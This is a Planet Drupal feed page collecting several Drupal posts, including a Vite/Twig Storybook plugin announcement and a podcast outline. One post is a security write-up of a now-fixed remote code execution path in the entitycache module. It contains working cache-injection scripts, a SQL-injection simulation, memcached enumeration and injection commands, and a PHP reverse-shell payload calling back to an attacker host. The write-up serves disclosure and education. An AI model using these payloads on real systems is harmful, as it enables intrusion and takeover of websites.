Planet Drupal
LN Webworks: Google Tag Manager With Drupal: All You Need to Know
Maximizing website engagement and interactivity is a major goal for all marketers. However, managing numerous third-party integrations and tracking tools is a laborious task. Thankfully, Google created Google Tag Manager to simplify the complicated lives of marketing teams worldwide. It makes managing, updating, and tracking tags, snippets, and third-party integrations a piece of cake.
The best part is that the platform is intuitive and user-friendly, which contributes a fair share to its massive appeal. If you own a Drupal website and, like many others, wonder how to use Google Tag Manager with Drupal, this blog is all you need. It explains everything in a detailed yet simplified manner.
First, let’s delve into what Google Tag Manager is and what makes it special.
Tag1 Consulting: A Guide to Estimating Migrations - How Much Will My Drupal Migration Cost? Part 2/3
This podcast series focuses on the strategies involved in upgrading and migrating Drupal websites and applications.
Read more michaelemeyers Tue, 11/28/2023 - 06:00
Specbee: Handling Custom Drupal Migrations Using SqlBase
Agiledrop.com Blog: Interview with John Faber of Chapter Three: Next-Drupal & securing the future of Drupal
PreviousNext: Drupal front-end nirvana with Vite, Twig and Storybook
We're proud to announce the release of vite-plugin-twig-drupal, a plugin for Vite that we hope will improve your workflow for front-end development with Drupal.
by lee.rowlands / 28 November 2023

The problem space

You're working with Twig in a styleguide-driven development process. You're writing isolated components that consist of CSS, Twig and JavaScript. You want to be able to use Twig to render your components for Storybook. You want fast refresh with Vite. You want Twig embeds, includes and extends to work. You want to use Drupal-specific Twig features like create_attributes etc. You want compilation of PostCSS and SASS to CSS. You want Hot Module Reloading (HMR) so that you can see how your components look without needing to endlessly refresh.
Enter vite-plugin-twig-drupal

The Vite plugin Twig Drupal is a Vite plugin, based on Twig JS, for compiling Twig-based components into JavaScript functions so that they can be used as components with Storybook. It allows you to import Twig files into your story as though they were JavaScript files.
Comparison to other solutions

- Vite plugin twig loader doesn't handle nested includes/embeds/extends. These are a fairly crucial feature of Twig when building a component library, as they allow re-use and DRY principles.
- Components library server requires you to have a running Drupal site. Whilst this ensures your Twig output is identical to that of Drupal (because Drupal is doing the rendering), it is a bit more involved to set up. If you're going to use single directory components or a similar Drupal module like UI Patterns, then this may be a better option for you.
This module is distributed via npm, which is bundled with node and should be installed as one of your project's devDependencies:
npm install --save-dev vite-plugin-twig-drupal

You then need to configure your vite.config.js.
import { defineConfig } from "vite"
import twig from 'vite-plugin-twig-drupal';
import { join } from "node:path"
export default defineConfig({
  plugins: [
    // Other vite plugins.
    twig({
      namespaces: {
        components: join(__dirname, "/path/to/your/components"),
        // Other namespaces as required.
      },
      // Optional if you are using React storybook renderer. The default is
      // 'html' and works with storybook's html renderer.
      // framework: 'react'
    }),
    // Other vite plugins.
  ],
})

With this config in place, you should be able to import Twig files into your story files.
Examples

To make use of a Twig file as a Storybook component, just import it. The result is a component you can pass to Storybook or use as a function for more complex stories.
// stories/Button.stories.js
// Button will be a JavaScript function that accepts variables for the twig template.
import Button from './button.twig';
// Import stylesheets, this could be a sass or postcss file too.
import './path/to/button.css';
// You may also have JavaScript for the component.
import './path/to/some/javascript/button.js';

export default {
  title: 'Components/Button',
  tags: ['autodocs'],
  argTypes: {
    title: {
      control: { type: 'text' },
    },
    modifier: {
      control: { type: 'select' },
      options: ['primary', 'secondary', 'tertiary'],
    },
  },
  // Just pass along the imported variable.
  component: Button,
};

// Set default variables in the story.
export const Default = {
  args: { title: 'Click me' },
};

export const Primary = {
  args: { title: 'Click me', modifier: 'primary' },
};

// Advanced example.
export const ButtonStrip = {
  name: 'Button group',
  render: () => `
    ${Button({title: 'Button 1', modifier: 'primary'})}
    ${Button({title: 'Button 2', modifier: 'secondary'})}
  `,
};

Here's how that might look in Storybook (example from the Admin UI Initiative storybook).
Dealing with Drupal.behaviors

In cases where the JavaScript you import into your story file uses a Drupal behavior, you'll likely need some additional code in your Storybook configuration to handle firing the behaviors. Here at PreviousNext, we prefer to use a loadOnReady wrapper, which works with and without Drupal. However, if you're just using Drupal.behaviors, something like this in your Storybook config in main.js (or main.ts) will handle firing the behaviors.
const config = {
  // ... existing config
  previewBody: (body) => `
    <script>
      window.Drupal = window.Drupal || { behaviors: {} };
      window.drupalSettings = Object.assign(window.drupalSettings || {}, {
        // Mock any drupalSettings your behaviors need here.
      });
      // Mock Drupal's once library too.
      window.once = (_, selector) => document.querySelectorAll(selector);
      document.addEventListener('DOMContentLoaded', () => {
        Object.entries(window.Drupal.behaviors).forEach(([key, object]) => object.attach(document));
      });
    </script>
    ${body}
  `,
  // ... more config
}

Give it a try

We're looking forward to using this plugin in client projects and are excited about the other possibilities Storybook provides us with, such as interaction and accessibility testing.
Thanks to early testers in the community, such as Ivan Berdinsky and Sean Blommaert, who've already submitted some issues to the github queue. We're really happy to see it in use in the Admin Initiative's work on a new toolbar.
Give it a try, and let us know what you think.
Tagged Storybook, Front End Development

The Drop Times: Droopler's Next Chapter: Grzegorz Pietrzak's Insights | Part 2
The Drop Times: Drupal Core 10.3.0 Upgrade Enables Seamless Integration of Computed Bundle Fields in Views
Talking Drupal: Talking Drupal #426 - Needs Review Queue Initiative
Today we are talking about the Needs Review Queue Initiative, what it is, and how it's helping to improve Drupal, with guest Stephen Mustgrave. We'll also cover Translation Management Tool as our module of the week.
For show notes visit: www.talkingDrupal.com/426
Topics

- Can you give an overview of the Needs Review Issue Queue Initiative
- Is the bug smash initiative related to the needs review issue queue
- Is this the same as the needs review bot
- How many issues were in the Needs Review status when you started
- How many issues today
- How long did it take until it was manageable
- How long do items stay on average
- Who else is helping
- Let’s talk through the pagination heading level issue
- What help can the community provide
- How does someone get involved
- Do you think this helps with burnout for core committers
- What’s the future of the initiative
Stephen Mustgrave - smustgrave
Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka
MOTW Correspondent

Martin Anderson-Clutz - @mandclu
Translation Management Tool (TMGMT)
- Brief description:
- Have you ever wanted to automate the process of creating content translations on your Drupal site? There’s a module for that.
- Brief history
- How old: created in Jan 2012
- Versions available: 7.x-1.0-rc3 and 8.x-1.15, the latter of which works with Drupal 9 and 10
- Maintainership
- Actively maintained
- Test coverage
- Documentation
- Number of open issues: 595, 139 of which are bugs against the 8.x branch
- Usage stats:
- 8,766 sites
- Maintainer(s):
- Berdir, a very prolific maintainer in his own right, who also supports well known projects like Search API, Token, Paragraphs, and many more
- Module features and usage
- Provides a tool set for automating the process of creating translations for your site content, as well as strings used within the site like menus, interface text, and so on
- Works with more than 30 translation service providers, including many that leverage human translators, but also AI-based services like DeepL and OpenAI
- Also has a plugin system to determine what text needs to be translated, so it can be easily adapted to very custom needs
- With the module installed, the Translate tab on your nodes changes to have buttons to request a translation in each language
- Once a translation has been requested, it will run through states like unprocessed, active, and finished
- Also provides an option for Continuous Translation, where new and updated content is automatically submitted for translation
- Allows for professional translation at scale, using whatever kind of service works best for your site
- The need for robust translation capabilities is what originally got me started using Drupal, so it’s great to see that there are enterprise-grade options for sites that need to manage translations at scale
mcdruid.co.uk: Remote Code Execution in Drupal via cache injection, drush, entitycache, and create_function
PHP's create_function() was:
DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0
As the docs say, its use is highly discouraged.
PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular linux distributions provide support for years beyond the upstream End of Life).
Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.
The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.
The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.
This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.
To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.
Is it unsafe input?

Interestingly, the issue is in a drush-specific inc file:
/**
 * Implements hook_drush_cache_clear().
 */
function entitycache_drush_cache_clear(&$types) {
  $entities = entity_get_info();
  foreach ($entities as $type => $info) {
    if (isset($info['entity cache']) && $info['entity cache']) {
      // You can't pass paramters to the callbacks in $types, so create an
      // anonymous function for each specific bin.
      $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);");
      $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba;
    }
  }
}

https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...
Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.
So - as is often the case - it's very risky to pass unsafe user input to it.
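A minimal sketch of why this matters. The payload string below is hypothetical, and we only build the generated code as a string (so it also runs on PHP 8, where create_function() is gone):

```php
<?php
// Hypothetical attacker-controlled entity type name (array key).
$type = "x', TRUE);} system('id'); //";

// This is the string the entitycache code would hand to create_function().
$code = "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);";

// The single quote in $type breaks out of the string literal, and the
// closing brace ends the generated lambda early, so create_function()
// (which evaluates its arguments much like eval()) would run system('id')
// as soon as it compiled this code.
echo $code, "\n";
```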
In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().
Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?
entity_get_info() uses a cache to minimise calls to implementations of hook_entity_info().
If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.
Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.
How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:
Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.
So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.
We'll also look at how an attacker might use memcache as an attack vector.
Proof of ConceptTo keep things simple initially, we'll look at conducting the attack via SQL.
Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.
As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.
Objectives
- The malicious payload has to be injected into the array keys of the cached data returned by entity_get_info().
- The injection cannot break Drupal so badly that drush cannot run a cache clear.
- However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).
We can see that the relevant cache item here is:

$cache = cache_get("entity_info:$langcode")

The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:
array('malicious payload' => 'foo');

Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_get_info() will return.
The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.
We can use drush to run some simple code that stores our array into the cache:
$ drush php
>>> $entity_info = array('malicious payload' => 'foo');
=> [
     "malicious payload" => "foo",
   ]
>>> cache_set('entity_info:en', $entity_info);

Now let's look at the cache item in the db:
$ drush sqlc
> SELECT * FROM cache WHERE cid = 'entity_info:en';
+----------------+-------------------------------------------+--------+------------+------------+
| cid            | data                                      | expire | created    | serialized |
+----------------+-------------------------------------------+--------+------------+------------+
| entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} | 0      | 1696593295 | 1          |
+----------------+-------------------------------------------+--------+------------+------------+

Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)
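To see concretely that the attacker-chosen key survives the round trip, we can unserialize that exact blob from the data column; a minimal sketch, independent of Drupal:

```php
<?php
// The serialized blob exactly as stored in the cache table's data column.
$blob = 'a:1:{s:17:"malicious payload";s:3:"foo";}';

// Drupal's cache_get() will unserialize this, restoring the attacker's
// array key intact.
$data = unserialize($blob);
print_r(array_keys($data));
```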
How is the site doing now? Let's try a drush status:
$ drush st
Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc).
Drush was not able to start (bootstrap) Drupal.
Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.

That's not so great, and importantly we get the same error when we try to clear caches by running drush cc all.
We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.
The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.
It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.
We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb) and is therefore quite cumbersome to manipulate.
Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.
It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.
Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:
$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user'],
];

Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.
Let's try injecting that into the cache via drush php and then checking whether drush is still functional.
It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.
$ cat cache_injection.php
<?php
$entity_info['user'] = [
  'controller class' => 'EntityCacheUserController',
  'base table' => 'users',
  'entity keys' => ['id' => 'uid'],
  'schema_fields_sql' => ['base table' => ['uid']],
  'entity cache' => TRUE,
];
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'malicious payload' => $entity_info['user'],
];
cache_set('entity_info:en', $entity_info);

$ drush scr cache_injection.php
$ drush st
 Drupal version : 7.99-dev
 ...snip - no errors...
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => malicious payload
)

We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info().
$ drush cc all
'all' cache was cleared.
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => comment
    [1] => node
    [2] => file
    [3] => taxonomy_term
    [4] => taxonomy_vocabulary
    [5] => user
)

We're making progress though.
Let's try putting an actual payload into the array key in our script:
$ tail -n7 cache_injection.php
$entity_info = [
  'user' => $entity_info['user'],
  'file' => $entity_info['user'],
  'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user']
];
cache_set('entity_info:en', $entity_info);

$ drush scr cache_injection.php
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);} echo "code execution successful"; //
)
$ drush cc all
code execution successfulcode execution successful'all' cache was cleared.

Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.
A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.
Having said that we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do that, they wouldn't really need to mess around with injecting payloads into the caches.
Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.
Attack via SQLi

If we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";'
a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}

This is not very pretty to look at, but we can see our array has been serialized.
If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.
To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.
After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.
Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.
I often think fiddly things like this are the hardest part of developing these PoC exploits!
# inject the payload using a drush script
$ drush scr cache_injection.php
# extract the payload into a SQL statement stored in a file
$ echo -n "UPDATE cache SET data = '" > sqli.txt
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt
$ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt
# empty the cache table, and repopulate it with valid entries
$ drush sqlq 'DELETE FROM cache;'
$ drush st
# inject the payload, simulating SQLi
$ cat sqli.txt | drush sqlc
# execute the attack
$ drush cc all
code execution successful
...

So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.
In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.
However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.
Attack via memcache

How about if the caches are in memcache; what might an attack look like then?
First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.
The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.
The mechanics of how we might do so are a little different with a "memcache injection" though.
The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).
In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.
Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:
$ echo "stats slabs" | nc memcached 11211 | head -n2
STAT 2:chunk_size 120
STAT 2:chunks_per_page 8738
$ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2
ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s]
ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]

This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs, and this enumeration step may be a bit more complex.
So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.
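Judging from the keys in the cachedump output, the key appears to be assembled from the site prefix, the cache bin, and the URL-encoded cid. A rough sketch (inferred from the observed keys; the memcache module's actual key-building code may differ in detail):

```php
<?php
// Inferred key layout: <prefix>-<bin>-<urlencoded cid>.
$prefix = 'dd_d7';        // per-site key prefix
$bin = 'cache';           // cache bin
$cid = 'entity_info:en';  // cache ID

// urlencode() turns the ':' into '%3A', matching the observed keys.
$key = $prefix . '-' . $bin . '-' . urlencode($cid);
echo $key, "\n"; // dd_d7-cache-entity_info%3Aen
```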
We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.
There are a couple of small complications we're likely to encounter with this workflow.
One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.
If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.
We can get around this by disabling compression on our test site.
Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).
This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp intact, it's possible that the item will already have expired by the time the payload is injected into the target site, and the attack will not work.
It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.
There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.
Injecting an item into memcache will typically mean using the SET command.
The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).
Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.
We also need to ensure that the PHP serialized data remains consistent; for example, if we change an IP address we need to ensure that the string it sits within still has the correct length, e.g. s:80:\"foo' ...
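Both lengths can be computed rather than counted by hand. A rough sketch (the payload key and cache key here are illustrative, not taken from a real attack):

```php
<?php
// Illustrative array key carrying the injected code.
$payloadKey = "foo', TRUE);} echo 'x'; //";

// serialize() records each string's exact byte length (the s:NN: part),
// so any edit to the key must keep that number consistent.
$serializedValue = serialize([$payloadKey => 'foo']);

// The memcached SET command's <bytes> field must match the total length
// of the value that follows it.
$bytes = strlen($serializedValue);
$cmd = sprintf(
  "set dd_d7-cache-entity_info%%3Aen 4 0 %d\r\n%s\r\n",
  $bytes,
  $serializedValue
);
echo $cmd;
```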
Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:
$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211

This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().
$ ./poison_entity_info.sh # this script contains the memcache set command above
STORED
$ drush ev 'print_r(array_keys(entity_get_info()));'
Array
(
    [0] => user
    [1] => file
    [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);//
)
$ drush cc all
'all' cache was cleared.

Meanwhile in the attacker's terminal...
$ nc -nvlp 1337
Listening on 0.0.0.0 1337
Connection received on 172.19.0.3 58220
python -c 'import pty; pty.spawn("/bin/bash")'
mcdruid@drupal-7:/var/www/html$ head -n2 CHANGELOG.txt
Drupal 7.xx, xxxx-xx-xx (development version)
-----------------------

We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.
One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.
Perhaps the injection into the entity_info cache item already achieves that goal?
Could this attack also be carried out via Redis? Probably.
I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.
As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().
Thanks to Greg Knaddison (greggles) for reviewing this post.
Tags: drupal-planet, security, rce, php, drush

The Drop Times: The Transformative Power of Stories in the Drupal Community
Dear Readers,
"There's always room for a story that can transport people to another place."
—J.K. Rowling, Author of the Harry Potter Series

Stories wield an irresistible charm, not merely as narratives to absorb but as potent wellsprings of inspiration. With their unique ability to engage, convey essential messages, and kindle our imagination, stories have been passed down through generations, nestled in books, or shared through diverse media. They possess the remarkable power to evoke emotions and offer insights that resonate across cultures.
Beyond mere entertainment, stories often carry valuable lessons, acting as a bridge to connect individuals and fostering a sense of wonder and empathy. Through the art of storytelling, individuals gain fresh perspectives, discover motivation, and shape their understanding of the world and their identities.
In the Drupal community, Dries Buytaert, the visionary founder of Drupal, extends a heartfelt invitation. He encourages members to share their personal stories, illustrating how Drupal has left an indelible mark on their lives and careers. This initiative underscores the power of stories in nurturing community, collaboration, and shared experiences within the Drupal ecosystem.
As J.K. Rowling aptly notes, there's always room for stories that transport us to new realms. Within the Drupal community, these stories serve as a bridge connecting individuals through the transformative impact of Drupal on their professional journeys.
So, what is your Drupal story? Share and become part of the collective narrative that defines the Drupal experience.
Let us look into last week's stories by The Drop Times.
Last week, The Drop Times published part one of the interview featuring Grzegorz Pietrzak, a seasoned Tech Lead at Droptica specializing in PHP, Drupal, and Symfony. Engaging in a profound discussion with Thomas Alias K, a former sub-editor at TDT, Pietrzak shared distinguished perspectives on various facets of Drupal, the dynamic role of Droopler in corporate website development, and his insights into constructing effective PHP teams.
The latest featured stories by our sub-editor, Alka Elizabeth, dive into notable happenings within the Drupal community. An insightful examination of challenges encountered in the Drupal Distributions and Recipes Initiative takes center stage as contributor Jim Birch sheds light on a pertinent issue. This discovery catalyzes an ongoing initiative to address and overcome challenges associated with these essential elements of Drupal development.
Further contributing to Drupal's evolution, an adjustment was proposed by Alex Pott in response to issue #339889, which is set to bring about a significant change in the upcoming 10.2.x version of the Drupal core. This modification aims to streamline the configuration system, eliminating the need to list configuration in 'getEditableConfigNames()' when using '#config_target' in forms. The goal is to enhance the developer experience by simplifying processes and eliminating redundant configuration declarations.
Additionally, a substantial change in Drupal Core has been implemented in version 10.2.x. The widely recognized EntityReferenceTestTrait has undergone a renaming to EntityReferenceFieldCreationTrait. Behind this transformative modification is the dedicated effort of contributor Stephen Mustgrave, and it officially took effect on November 16, 2023.
DrupalCon Portland 2024 is currently seeking volunteers and summit contributors. Florida DrupalCamp 2024 is gearing up for its sixteenth annual event and searching for sponsors. The event will take place at the Florida Technical College in Orlando. If you're interested in sponsoring Florida DrupalCamp 2024 or would like more information about the event, including dates, available training sessions, and registration details, look no further. Learn more about this week's Drupal events here.
MidCamp, the Midwest Drupal Camp, has officially opened its call for session submissions for its 2024 event. Additionally, FOSDEM, the renowned free software event fostering collaboration and idea sharing within the open-source community, invites participation in presentations for its upcoming twenty-fourth edition scheduled for February 3rd and 4th, 2024.
Specbee published a blog exploring the significance of Drupal 10 Theming. Additionally, they are hosting a webinar titled "Getting Started with Drupal 10 Theming," scheduled for December 6, 2023.
The Acquia Engage conference wrapped up with discussions centered on experimentation and exploration. These emerging trends were featured in an article by Dom Nicastro. Discover the enhanced capabilities of the Drupal platform with the introduction of new features and improvements in Drupal 10.1. Dive deeper into these updates by reading the blog.
The digital landscape undergoes further evolution as PHP unveils its newest version, PHP 8.3. This latest iteration, packed with a myriad of enhancements and refinements, is poised to make a substantial impact on web development.
Lucio Waßill's demonstration on the Migrate Module provided valuable insights into establishing a demo-ready Drupal environment. The emphasis was on optimizing content creation processes by effectively utilizing the Migrate module.
Prepare for the imminent arrival of Drupal Gutenberg 3, as the beta version is now available for testing under Gutenberg 3.0.0-beta1. Users eager to integrate this update into Drupal 10 can seamlessly do so using Composer with the installation command. Revamp Drupal search boxes effortlessly with the Better Search Block: a user-friendly solution developed by 3C Web Services and maintained by Yogesh Pawar. This module stands out for its ability to enhance both the visual appeal and functionality of Drupal search boxes.
Dries Buytaert, the visionary behind Drupal, extends a heartfelt invitation to the Drupal community, encouraging individuals to share their personal narratives on Drupal's profound impact on their lives and careers.
Explore enhanced Drupal development efficiency by delving into the synergy between Visual Studio Code and DDEV in OSTraining's latest blog post. Gain practical insights into leveraging Visual Studio Code, a widely used and robust source-code editor, to streamline and optimize your Drupal development workflows. Droptica releases Drupal Website Maintenance Guide, a comprehensive e-book tailored for Drupal website owners seeking effective strategies for support, care, and maintenance.
So these are the highlights from TheDropTimes. Feel free to contact us with any suggestions, contributions, or feedback. Thank you for being a part of our community. Until the next edition, keep exploring, sharing, and embracing the power of knowledge! Follow us on LinkedIn, Twitter and Facebook.
Sincerely,
Elma John
Sub-editor, The DropTimes
Four Kitchens: Using Composer for modules not ready for the next major version of Drupal
Senior Support Lead
Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.
At the time of this writing, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman, to make this process easier.
